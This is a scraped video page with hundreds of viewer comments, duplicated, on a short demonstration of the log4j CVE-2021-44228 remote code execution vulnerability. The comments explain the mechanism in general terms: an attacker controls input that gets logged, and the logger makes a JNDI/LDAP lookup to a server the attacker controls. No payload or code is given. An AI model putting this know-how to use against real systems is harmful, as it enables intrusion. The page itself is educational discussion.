Walking through how the log4j CVE-2021-44228 remote code execution vulnerability works and how it's exploited.
Жүктеу.....
Пікірлер: 257
@mint5302 жыл бұрын
You saying "just came out a few days ago" makes it sound like a fun new game just got released haha
@MalwareTechBlog
2 жыл бұрын
Yeah lol, I just realized that 😂
@techutility
2 жыл бұрын
🤣🤣🤣🤣🤣
@-bubby9633
2 жыл бұрын
Tbf for us security professionals this is basically like a new game was just released 😂
@dipankarmitra3334
2 жыл бұрын
@@-bubby9633 🤣🤣🤣
@OmprakashYadavIIT
2 жыл бұрын
😂😂
@_JohnHammond2 жыл бұрын
Great demonstration, Marcus!
@anuzravat
2 жыл бұрын
U got 1 subscriber
@seppy624
2 жыл бұрын
hey john
@Clytax
4 ай бұрын
@@anuzravatMore like 1.2million
@devinmagee19482 жыл бұрын
It's my first week working in cyber security environment professionally. Trying to get a grasp on my organization's infrastructure while trying to help with the log4j vuln has been a real trial by fire lol. Always enjoy your content!
@complexedone
2 жыл бұрын
I understand. I just joined a new org as part of the infrastructure team. I still don't know all our systems, but I'm learning fast as I help to find and patch systems as needed/available.
@jasrid04
2 жыл бұрын
Welcome to the industry and good luck!
@devinmagee1948
2 жыл бұрын
@@complexedone Good Luck. We will get there eventually!
@manfrombritain6816
2 жыл бұрын
what have you been doing to help? what's your role? i'm looking to start in security soon!
@jdemuro1
2 жыл бұрын
Best way to learn quickly though. This is a blessing in disguise for you!
@ltsmash95442 жыл бұрын
I love how you actually demonstrate the vulnerability and not just talk about it, like what most others are doing. Keep it up mate, you've got my Subscribe!
@zedzpan
2 жыл бұрын
Yup, learnt more from this than the over engineered blogs I've been tracking!
@slaloulin8289
2 жыл бұрын
not to mention how he only did it in ~3 mins, saves a lot of times for such a great explanation
@brianrdetweiler2 жыл бұрын
Clicking various links for 30 minutes, trying to understand the issue, and you explain it in less than 4. Thank you!
@AlphaZeroOmega2 жыл бұрын
Thanks Marcus. I appreciate your ability to explain a vulnerability like this and demo it in a really understandable way.
@badashgr82 жыл бұрын
With videos out there in 20+ mins and you here with less than 4 mins explaining it so clearly, I know which video to click from next time.
@romanxyz72482 жыл бұрын
I had problem understand this from days and you explained it under 4 mins. You're amazing Marcus 👏❤️
@masettyvivek81552 жыл бұрын
This is one of the great demonstrations I have listened on KZread. You are amazing!!
@andresromerodev2 жыл бұрын
This explanation is so cool! I’ve been hearing about the vulnerability but nobody took the time to explain it this way. Thank you! :)
@Swing172 жыл бұрын
Very well explained. Good video Marcus!
@abhilpnYT2 жыл бұрын
One of the best explanations with practical demo. Thank you ..
@lofman2 жыл бұрын
"versatile" is the key word for this vulnerability. thanks for explaining! :)
@DavisTibbz2 жыл бұрын
First time understanding what this means. Thanks.
@Svalbaz2 жыл бұрын
I work in IT and the last week or two has been absolutely mental thanks to this
@kosmonautofficial2962 жыл бұрын
Always cool to see a Marcus video out on a new vuln!
@BSwitchGTG2 жыл бұрын
Just started a new job, and moved my support area from networking to applications. Day 1 of the new gig and I was hearing it was an all-hands to deal with the "new vulnerability". Thankfully new enough that there was no headache for me to deal with, but oof, glad to see what they were up against!
@Burgundy_towel2 жыл бұрын
Thanks for such layman explanation, I was able to grasp it..
@calmeidazim2 жыл бұрын
Thank You Marcus, simple but quiet clear to understand
@FloresMenyapa Жыл бұрын
Greetings from Indonesia, I really admire you, and you are great. I'm just a beginner who wants to learn like you from the bottom
@sniGGandBaShoR2 жыл бұрын
the variable thing in a string is called string interpolation my dude!
@AM-og2oi2 жыл бұрын
thank you for this video marcus!!! alot of news on this and this has helped me out get a better understanding of how the vulnerability functions
@YourWaifu02 жыл бұрын
Nice explanation, I believe showing how easy it is to do is the scary part more than anything since a lot of applications use log4j.
@zaitarh2 жыл бұрын
The ${…} syntax is not part of Java - it’s solely a Log4j syntax. (If it were part of java there would have been no problem, as it would have been evaluated at compile-time, not run-time)
@marcellkovacs5452
2 жыл бұрын
@@kpaxxapk6397 the logger should sanitise the input the same way an ORM sanitises model insance lookups to avoid SQL injection.
@zaitarh
2 жыл бұрын
@@kpaxxapk6397 In theory, it's a fair point - it certainly would be possible to sanitize it. But 1) the documentation did not state this anywhere afaik and 2) no one is interested in having a logging framework where you have to sanitize everything. People just want to do "log.error("My error: {}", error)" and be done with it. I've used Log4j before some years ago, and never knew about that "Lookup" feature - and aparently i was not the only one. :) Imho, it was a very annoying feature, security flaw or not, as i don't want the text i log to sometimes be transformed into something else, just because it happens to contain "${" and "}"... And this undesirable feature was enabled by default...
@zaitarh
2 жыл бұрын
@@kpaxxapk6397 Note: It would kind of be possible for Log4j to sanitize it itself... If they forced you to use it in a specific way... You CAN (but don't have to) use the logger as having a format string as first param, and then data-values for the rest of the params (similar to printf, etc)..: log.info("This is the format string. Data is {} and {}", data1, data2);
@fox2code
2 жыл бұрын
@@zaitarh This RCE was a feature, not a bug, I saw the code, it was done intentionally, I'm sure someone added this feature on purpose to use it for what the video showed us.
@reemontel8036
2 жыл бұрын
No idea why I always assume the ${...} syntax is Spel from the spring spell syntax but I'm not 100% sure if that's correct or not
@53kt0r2 жыл бұрын
Great video! plain, simple and without bias.
@DalBileAbas5 ай бұрын
Thanks for simplifying the vulnerability
@GGdevelopment2 жыл бұрын
Great job at presenting the vulnerability!
@das_evoli2 жыл бұрын
Finally no bullshitting around. Straight to the point and understandable for every novice programmer
@mdzen22e Жыл бұрын
just what am looking for....thx dude
@strato_54592 жыл бұрын
good explination. told exactly what it is and how it works. yeah i know what im looking at already but for anyone else that has no idea, this is the video they should watch
@tapion19982 жыл бұрын
I can't believe that it is that simple. The first thing you learn is always to control the input that is given. That is why you wont just take the given SQL command and execute it. To think that log4j didn't sanitise their input ist just CRAZY. That's a one liner, my god...
@yodamaxwell2 жыл бұрын
Fantastic demonstration!
@DaraulHarris2 жыл бұрын
Subbed. That was an excellent explanation.
@metrixc2 жыл бұрын
Hi Marc, great video. If I see it right, the outbound connections to e.g. a LDAP server is always unencrypted since JNDI does regular (unencrypted) lookups. That means that companies could look for unexpected outbound LDAP requests to servers on the internet right? Just curious. Would there be a way to make these outbound requests encrypted? Thank you!
@razzeeee2 жыл бұрын
Best summary yet
@imkir4n2 жыл бұрын
clean explanation marcus!
@willemachternaam6902 жыл бұрын
'Drop bobby tables' for Java. Nice! Thank you for this.
@pjj19472 жыл бұрын
Thanks Marcus! Sweet and clean explanation!
@edgay2 жыл бұрын
This 4 minute video was more clear and valuable then the 30minute one i just watched on this rce
@edgay
2 жыл бұрын
cough johnhammond cough
@kotiwa2 жыл бұрын
You made this very easy to understand. thanks!
@manideepkumar9592 жыл бұрын
Better than java brains log4j explanation,now i understand
@florian5382 жыл бұрын
Could you solve this issue by looking for an outcommenting the feature in the log4j library?
@valentinpopescu67042 жыл бұрын
How can you set up the LDAP server on localhost and which port to choose?
@anonymous66662 жыл бұрын
great explanation and demo
@cool-aquarian2 жыл бұрын
when I try to do same thing in my eclipse using log4j It is simply printing in log message.. Any clue why ?
@jasonOfTheHills2 жыл бұрын
Great explanation. And wow.
@ndenkha2 жыл бұрын
Great video. Question, so is the problem that even though log4j stores that command string in a log file it gets executed while being written to the file?
@thelineidk2 жыл бұрын
And if I go to 2b2t from my phone, for example, will the exploit work on me? (I play java minecraft on my phone)
@TheGameIsOverCy2 жыл бұрын
Nice explanation ! Thank you :)
@TreeFrogOnATree2 жыл бұрын
well, well that's really interesting thanks for uploading!
@TheBenJiles2 жыл бұрын
Simple. To the point. Thanks man
@Robert-pt2jz5 ай бұрын
Hello, i am just curious. I have a statement and would like to know if my logic is correct. The vulnerability is caused due to no input checking in the program, allowing unintentional interaction with the user? Is this a correct way to view this or am i way off base?
@chess5982 жыл бұрын
Concise and to the point, thanks!
@01071985hh2 жыл бұрын
impactful explanation thanks
@xl83732 жыл бұрын
Great demonstration , thank you !
@majorassault50742 жыл бұрын
I have to ask, what happens if you are running a VPN? Will the VPNs server get infected with whatever malware/ransomware/trojan/ddos/worm a black hat sends their way?
@hellboykuro2 жыл бұрын
hi can anyone help me when i try to inject any executor in any game it says "This exploit is down while critical ace/rce vuln is fixed" this is on roblox btw
@andreasMou1232 жыл бұрын
nice demo, thanks!
@tinkleondabeach2 жыл бұрын
Thx daddy great explanation
@Glitchflim2 жыл бұрын
How to fix the issue any steps are there
@freddyfozzyfilms2688 Жыл бұрын
Can u also input a lambda?
@BirgerBurgerBargir2 жыл бұрын
Great video
@ewerybody2 жыл бұрын
Wasn't the base64 an extra indirection? The class you're loading can't pop Calc.exe directly? 🙄
@freekdeman2 жыл бұрын
Thanks, really helpful.
@wcsoutdoors13932 жыл бұрын
I love your videos
@victorburnett63292 жыл бұрын
Wow, that is a pretty glaring vulnerability. Amazing it's only just been discovered.
@BruceDuncan2 жыл бұрын
I still don't get it. What is it that is being returned over LDAP? Is it the base64-encoded string "calc.exe"? Is it a Java object which is doing Runtime.getRuntime().exec("calc.exe")? It's been nearly a week and I still don't get it!
@EnglishRain2 жыл бұрын
Thank you for this!
@danielblanchette85932 жыл бұрын
So you're telling me that the Log4j vulnerability is roughly the same as there was with linux a while ago where if you put something like [{:}};} (don't remember the exact spelling) you can then enter a command that can be executed from an app or the other thing that happened to twitter where you could send a tweet that would retweet itself in your browser... Why is it always the same vulnerability that is found?
@chickendumpling95952 жыл бұрын
I know I’m late to the party but I would greatly appreciate it of someone could clarify some things for me: 1) that error at the end, I cant quite catch it but I figure it must be due to the fact that the downloaded object cannot be concatenated without a toString method or something like that? 2) Isnt that base64 ‘calculator.exe’ just a directory on your server, not part of the actual object? 3) what is that on line 8? Is setting that property necessary for this exploit to work? Again, I appreciate highly any response :)
@bagzhansadvakassov10932 жыл бұрын
I wonder how many 0-day expoits out there in the open software.
@patrickmcevoy17762 жыл бұрын
Isn't 1.8 not vulnerable from the exploit though?
@susulemons2 жыл бұрын
how does an attacker make the call in the first place though? (have access to call the function with the string
@MalwareTechBlog
2 жыл бұрын
By controlling some input that gets logged by the application
@sergedeugoue25692 жыл бұрын
Maybe I'm overlooking things but it seems so obvious. How did this vulnerability take years to discover?
@luisdawa2 жыл бұрын
Isn't it somewhat similar to SQL Injection?
@paulkelly56182 жыл бұрын
Awesome video! Quick question: What is the symbol you have on line 11 of your code just after "logger.error(" but before "Hello..."
@corv882002
2 жыл бұрын
It says "s:" and is inserted by the ide to let you know what the parameter's called
@philipjfry4465
2 жыл бұрын
parameter hinting
@WhiteSiroi7 ай бұрын
thank you, very heplful
@peter112562 жыл бұрын
Great explanation. I just didn't quite understand one thing. Is it necessary for the object you are loading to exist in the ldap server ?
@isomeme
2 жыл бұрын
Yes, but as the attacker can point the lookup to an ldap server they control, that's easy to arrange.
@MH-oc4de2 жыл бұрын
To be clear, it's the log4j logger that is doing the ${variable} expansion, and not the shell (?) e.g., if you print out username within the code it is not a problem, but log4j is (somehow) executing it ? Thanks!
@MalwareTechBlog
2 жыл бұрын
Correct
@rommeljoven10462 жыл бұрын
Thanks for the demo. May i know what will be the parent process of "calc.exe"? would it be "java.exe"?
@MalwareTechBlog
2 жыл бұрын
Yup, it'll be the java VM
@krizanand2 жыл бұрын
Pretty much every security team in an organization is stuck on log4j meeting 😜 Wonderful explanation though of the exploit.
@kingKabali2 жыл бұрын
Right to the point. Thanks man.
@logicfirst79592 жыл бұрын
You are the man Marcus, one thing though, how can i emulate this into my environment, I tried your commands and getting Error: Could not find or load main class Main error.
2 жыл бұрын
thanks for the explanation, going to make a documentary on this!
@tansanwastaken
2 жыл бұрын
Purchased botted sub account, ratio
@mandokir
2 жыл бұрын
Great, a whole documentary nobody asked for.
@traxooza2 жыл бұрын
Coming from a C++ background, I can't see why the code in "username" gets evaluated. Is it because log4j triggers this evaluation somehow ? Why would it do that ?
@scarletdice
2 жыл бұрын
correct, log4j evaluates the variable that is wrapped around by ${...} (its own syntax for string interpolation). That and combined by some remote JNDI lookup/mechanism within the library itself, a feature that they claimed were needed for backward compatibility purposes (??). Note that JNDI is a standard in Java that allows remote object load/lookup (!!).
@tuananhtass36932 жыл бұрын
tks, Marcus!
@patco2582 жыл бұрын
Great great great video
@thexlr8rkid2 жыл бұрын
This video is perfect
@lIlIllll12 жыл бұрын
what terminal thing are you using where you can see both the application code and terminal? (Im a noob dont yell LOL)
@nickpechie6951
2 жыл бұрын
thats the built in terminal in IntelliJ
@jackofnotrades152 жыл бұрын
Its not a part of java as somebody mentioned before. The syntax is kind of string interpolation though.
@melkileo2 жыл бұрын
It's quite a good video but I think you should have talken about the jndi/ldap breach that enable rce. Jndi/ldap basically doesn't allow to inject malicious code, but a breach form 2017 make it possible to inject and initialize a custom Java class the ldap server redirects to
@losthedgehog39222 жыл бұрын
Great. Now show the LDAP server configuration and how exactly it serves the java object payload. None of the videos seem to explain how that works. They either evade it or use marshalsec LDAP server also never explaining how it works.
@sonalita_2 жыл бұрын
I'm still confused about how the jndi payload gets executed (i.e. calc.exe) in this case - isn't the jndi lookup just returning data? what is it that makes it actually execute calc.exe??? nobody seems to be able to explain this.
@arvidmildner6274
2 жыл бұрын
As I've understood it, it's basically a "hook" and the intended functionality of log4j which says: take this url, load the object/function there and run it. So the reason it is run is because that's how it was supposed to be. It's not the malicious code itself that says that it should be run. But I may be wrong here.
@53kt0r
2 жыл бұрын
To answer your question: yes. everything in here is data (even this video itself), eg: Y2FsYy5leGU= is calc.exe in base64, that is the resource is loading thru JNDI and passed it to the log4j logguer as a variable to be logged. I think that is clear enough, hopefully for you too. Cheers!
@Pcatalin662 жыл бұрын
${variable} is EL expression for server scripting. Looks similar with string interpolation from c# : $"{yourVarHere}"
@djvex61802 жыл бұрын
Thank you so much.
@redwaller12 жыл бұрын
Words cannot describe- how did this slip unnoticed? I cannot imagine writing code that would result in behavior like this, and yet it must surely be a trap even experienced developers might fall into.
@maxwellmapako3820
2 жыл бұрын
I honestly believe that you cannot cater for what you don't expect 🤣
@jayit6851
2 жыл бұрын
@@maxwellmapako3820 This is like a classic example of unsanitized input. Idk how any experienced developer like those working with the Apache Foundation couldn't expect that.
@user-do6gr5ww5e
2 жыл бұрын
I was just thinking - this seems adjacent to our classic case of SQL injection. Crazy
@EdwardInTX Жыл бұрын
thank you!
@CBMaster22 жыл бұрын
How has this just came out? Seems like a pretty straight forward exploit? Was it a new feature of log4j or something that has existed for a long time?
@jeremyFaden
2 жыл бұрын
Since 2013
@prasantabanerjee11842 жыл бұрын
Upgrading to 2.15/2.16 version of Log4J resolves this.
@Naglfar832 жыл бұрын
Nice demonstration, but the code is unreadable on a medium-sized smartphone like mine. Please consider zooming or increasing the font size before uploading.
Пікірлер: 257
You saying "just came out a few days ago" makes it sound like a fun new game just got released haha
@MalwareTechBlog
2 жыл бұрын
Yeah lol, I just realized that 😂
@techutility
2 жыл бұрын
🤣🤣🤣🤣🤣
@-bubby9633
2 жыл бұрын
Tbf for us security professionals this is basically like a new game was just released 😂
@dipankarmitra3334
2 жыл бұрын
@@-bubby9633 🤣🤣🤣
@OmprakashYadavIIT
2 жыл бұрын
😂😂
Great demonstration, Marcus!
@anuzravat
2 жыл бұрын
U got 1 subscriber
@seppy624
2 жыл бұрын
hey john
@Clytax
4 ай бұрын
@@anuzravatMore like 1.2million
It's my first week working in cyber security environment professionally. Trying to get a grasp on my organization's infrastructure while trying to help with the log4j vuln has been a real trial by fire lol. Always enjoy your content!
@complexedone
2 жыл бұрын
I understand. I just joined a new org as part of the infrastructure team. I still don't know all our systems, but I'm learning fast as I help to find and patch systems as needed/available.
@jasrid04
2 жыл бұрын
Welcome to the industry and good luck!
@devinmagee1948
2 жыл бұрын
@@complexedone Good Luck. We will get there eventually!
@manfrombritain6816
2 жыл бұрын
what have you been doing to help? what's your role? i'm looking to start in security soon!
@jdemuro1
2 жыл бұрын
Best way to learn quickly though. This is a blessing in disguise for you!
I love how you actually demonstrate the vulnerability and not just talk about it, like what most others are doing. Keep it up mate, you've got my Subscribe!
@zedzpan
2 жыл бұрын
Yup, learnt more from this than the over engineered blogs I've been tracking!
@slaloulin8289
2 жыл бұрын
not to mention how he only did it in ~3 mins, saves a lot of times for such a great explanation
Clicking various links for 30 minutes, trying to understand the issue, and you explain it in less than 4. Thank you!
Thanks Marcus. I appreciate your ability to explain a vulnerability like this and demo it in a really understandable way.
With videos out there in 20+ mins and you here with less than 4 mins explaining it so clearly, I know which video to click from next time.
I had problem understand this from days and you explained it under 4 mins. You're amazing Marcus 👏❤️
This is one of the great demonstrations I have listened on KZread. You are amazing!!
This explanation is so cool! I’ve been hearing about the vulnerability but nobody took the time to explain it this way. Thank you! :)
Very well explained. Good video Marcus!
One of the best explanations with practical demo. Thank you ..
"versatile" is the key word for this vulnerability. thanks for explaining! :)
First time understanding what this means. Thanks.
I work in IT and the last week or two has been absolutely mental thanks to this
Always cool to see a Marcus video out on a new vuln!
Just started a new job, and moved my support area from networking to applications. Day 1 of the new gig and I was hearing it was an all-hands to deal with the "new vulnerability". Thankfully new enough that there was no headache for me to deal with, but oof, glad to see what they were up against!
Thanks for such layman explanation, I was able to grasp it..
Thank You Marcus, simple but quiet clear to understand
Greetings from Indonesia, I really admire you, and you are great. I'm just a beginner who wants to learn like you from the bottom
the variable thing in a string is called string interpolation my dude!
thank you for this video marcus!!! alot of news on this and this has helped me out get a better understanding of how the vulnerability functions
Nice explanation, I believe showing how easy it is to do is the scary part more than anything since a lot of applications use log4j.
The ${…} syntax is not part of Java - it’s solely a Log4j syntax. (If it were part of java there would have been no problem, as it would have been evaluated at compile-time, not run-time)
@marcellkovacs5452
2 жыл бұрын
@@kpaxxapk6397 the logger should sanitise the input the same way an ORM sanitises model insance lookups to avoid SQL injection.
@zaitarh
2 жыл бұрын
@@kpaxxapk6397 In theory, it's a fair point - it certainly would be possible to sanitize it. But 1) the documentation did not state this anywhere afaik and 2) no one is interested in having a logging framework where you have to sanitize everything. People just want to do "log.error("My error: {}", error)" and be done with it. I've used Log4j before some years ago, and never knew about that "Lookup" feature - and aparently i was not the only one. :) Imho, it was a very annoying feature, security flaw or not, as i don't want the text i log to sometimes be transformed into something else, just because it happens to contain "${" and "}"... And this undesirable feature was enabled by default...
@zaitarh
2 жыл бұрын
@@kpaxxapk6397 Note: It would kind of be possible for Log4j to sanitize it itself... If they forced you to use it in a specific way... You CAN (but don't have to) use the logger as having a format string as first param, and then data-values for the rest of the params (similar to printf, etc)..: log.info("This is the format string. Data is {} and {}", data1, data2);
@fox2code
2 жыл бұрын
@@zaitarh This RCE was a feature, not a bug, I saw the code, it was done intentionally, I'm sure someone added this feature on purpose to use it for what the video showed us.
@reemontel8036
2 жыл бұрын
No idea why I always assume the ${...} syntax is Spel from the spring spell syntax but I'm not 100% sure if that's correct or not
Great video! plain, simple and without bias.
Thanks for simplifying the vulnerability
Great job at presenting the vulnerability!
Finally no bullshitting around. Straight to the point and understandable for every novice programmer
just what am looking for....thx dude
good explination. told exactly what it is and how it works. yeah i know what im looking at already but for anyone else that has no idea, this is the video they should watch
I can't believe that it is that simple. The first thing you learn is always to control the input that is given. That is why you wont just take the given SQL command and execute it. To think that log4j didn't sanitise their input ist just CRAZY. That's a one liner, my god...
Fantastic demonstration!
Subbed. That was an excellent explanation.
Hi Marc, great video. If I see it right, the outbound connections to e.g. a LDAP server is always unencrypted since JNDI does regular (unencrypted) lookups. That means that companies could look for unexpected outbound LDAP requests to servers on the internet right? Just curious. Would there be a way to make these outbound requests encrypted? Thank you!
Best summary yet
clean explanation marcus!
'Drop bobby tables' for Java. Nice! Thank you for this.
Thanks Marcus! Sweet and clean explanation!
This 4 minute video was more clear and valuable then the 30minute one i just watched on this rce
@edgay
2 жыл бұрын
cough johnhammond cough
You made this very easy to understand. thanks!
Better than java brains log4j explanation,now i understand
Could you solve this issue by looking for an outcommenting the feature in the log4j library?
How can you set up the LDAP server on localhost and which port to choose?
great explanation and demo
when I try to do same thing in my eclipse using log4j It is simply printing in log message.. Any clue why ?
Great explanation. And wow.
Great video. Question, so is the problem that even though log4j stores that command string in a log file it gets executed while being written to the file?
And if I go to 2b2t from my phone, for example, will the exploit work on me? (I play java minecraft on my phone)
Nice explanation ! Thank you :)
well, well that's really interesting thanks for uploading!
Simple. To the point. Thanks man
Hello, i am just curious. I have a statement and would like to know if my logic is correct. The vulnerability is caused due to no input checking in the program, allowing unintentional interaction with the user? Is this a correct way to view this or am i way off base?
Concise and to the point, thanks!
impactful explanation thanks
Great demonstration , thank you !
I have to ask, what happens if you are running a VPN? Will the VPNs server get infected with whatever malware/ransomware/trojan/ddos/worm a black hat sends their way?
hi can anyone help me when i try to inject any executor in any game it says "This exploit is down while critical ace/rce vuln is fixed" this is on roblox btw
nice demo, thanks!
Thx daddy great explanation
How to fix the issue any steps are there
Can u also input a lambda?
Great video
Wasn't the base64 an extra indirection? The class you're loading can't pop Calc.exe directly? 🙄
Thanks, really helpful.
I love your videos
Wow, that is a pretty glaring vulnerability. Amazing it's only just been discovered.
I still don't get it. What is it that is being returned over LDAP? Is it the base64-encoded string "calc.exe"? Is it a Java object which is doing Runtime.getRuntime().exec("calc.exe")? It's been nearly a week and I still don't get it!
Thank you for this!
So you're telling me that the Log4j vulnerability is roughly the same as there was with linux a while ago where if you put something like [{:}};} (don't remember the exact spelling) you can then enter a command that can be executed from an app or the other thing that happened to twitter where you could send a tweet that would retweet itself in your browser... Why is it always the same vulnerability that is found?
I know I’m late to the party but I would greatly appreciate it of someone could clarify some things for me: 1) that error at the end, I cant quite catch it but I figure it must be due to the fact that the downloaded object cannot be concatenated without a toString method or something like that? 2) Isnt that base64 ‘calculator.exe’ just a directory on your server, not part of the actual object? 3) what is that on line 8? Is setting that property necessary for this exploit to work? Again, I appreciate highly any response :)
I wonder how many 0-day expoits out there in the open software.
Isn't 1.8 not vulnerable from the exploit though?
how does an attacker make the call in the first place though? (have access to call the function with the string
@MalwareTechBlog
2 жыл бұрын
By controlling some input that gets logged by the application
Maybe I'm overlooking things but it seems so obvious. How did this vulnerability take years to discover?
Isn't it somewhat similar to SQL Injection?
Awesome video! Quick question: What is the symbol you have on line 11 of your code just after "logger.error(" but before "Hello..."
@corv882002
2 жыл бұрын
It says "s:" and is inserted by the ide to let you know what the parameter's called
@philipjfry4465
2 жыл бұрын
parameter hinting
thank you, very heplful
Great explanation. I just didn't quite understand one thing. Is it necessary for the object you are loading to exist in the ldap server ?
@isomeme
2 жыл бұрын
Yes, but as the attacker can point the lookup to an ldap server they control, that's easy to arrange.
To be clear, it's the log4j logger that is doing the ${variable} expansion, and not the shell (?) e.g., if you print out username within the code it is not a problem, but log4j is (somehow) executing it ? Thanks!
@MalwareTechBlog
2 жыл бұрын
Correct
Thanks for the demo. May i know what will be the parent process of "calc.exe"? would it be "java.exe"?
@MalwareTechBlog
2 жыл бұрын
Yup, it'll be the java VM
Pretty much every security team in an organization is stuck on log4j meeting 😜 Wonderful explanation though of the exploit.
Right to the point. Thanks man.
You are the man Marcus, one thing though, how can i emulate this into my environment, I tried your commands and getting Error: Could not find or load main class Main error.
thanks for the explanation, going to make a documentary on this!
@tansanwastaken
2 жыл бұрын
Purchased botted sub account, ratio
@mandokir
2 жыл бұрын
Great, a whole documentary nobody asked for.
Coming from a C++ background, I can't see why the code in "username" gets evaluated. Is it because log4j triggers this evaluation somehow ? Why would it do that ?
@scarletdice
2 жыл бұрын
correct, log4j evaluates the variable that is wrapped around by ${...} (its own syntax for string interpolation). That and combined by some remote JNDI lookup/mechanism within the library itself, a feature that they claimed were needed for backward compatibility purposes (??). Note that JNDI is a standard in Java that allows remote object load/lookup (!!).
tks, Marcus!
Great great great video
This video is perfect
what terminal thing are you using where you can see both the application code and terminal? (Im a noob dont yell LOL)
@nickpechie6951
2 жыл бұрын
thats the built in terminal in IntelliJ
Its not a part of java as somebody mentioned before. The syntax is kind of string interpolation though.
It's quite a good video but I think you should have talken about the jndi/ldap breach that enable rce. Jndi/ldap basically doesn't allow to inject malicious code, but a breach form 2017 make it possible to inject and initialize a custom Java class the ldap server redirects to
Great. Now show the LDAP server configuration and how exactly it serves the java object payload. None of the videos seem to explain how that works. They either evade it or use marshalsec LDAP server also never explaining how it works.
I'm still confused about how the jndi payload gets executed (i.e. calc.exe) in this case - isn't the jndi lookup just returning data? what is it that makes it actually execute calc.exe??? nobody seems to be able to explain this.
@arvidmildner6274
2 жыл бұрын
As I've understood it, it's basically a "hook" and the intended functionality of log4j which says: take this url, load the object/function there and run it. So the reason it is run is because that's how it was supposed to be. It's not the malicious code itself that says that it should be run. But I may be wrong here.
@53kt0r
2 жыл бұрын
To answer your question: yes. everything in here is data (even this video itself), eg: Y2FsYy5leGU= is calc.exe in base64, that is the resource is loading thru JNDI and passed it to the log4j logguer as a variable to be logged. I think that is clear enough, hopefully for you too. Cheers!
${variable} is EL expression for server scripting. Looks similar with string interpolation from c# : $"{yourVarHere}"
Thank you so much.
Words cannot describe- how did this slip unnoticed? I cannot imagine writing code that would result in behavior like this, and yet it must surely be a trap even experienced developers might fall into.
@maxwellmapako3820
2 жыл бұрын
I honestly believe that you cannot cater for what you don't expect 🤣
@jayit6851
2 жыл бұрын
@@maxwellmapako3820 This is like a classic example of unsanitized input. Idk how any experienced developer like those working with the Apache Foundation couldn't expect that.
@user-do6gr5ww5e
2 жыл бұрын
I was just thinking - this seems adjacent to our classic case of SQL injection. Crazy
thank you!
How has this just came out? Seems like a pretty straight forward exploit? Was it a new feature of log4j or something that has existed for a long time?
@jeremyFaden
2 жыл бұрын
Since 2013
Upgrading to 2.15/2.16 version of Log4J resolves this.
Nice demonstration, but the code is unreadable on a medium-sized smartphone like mine. Please consider zooming or increasing the font size before uploading.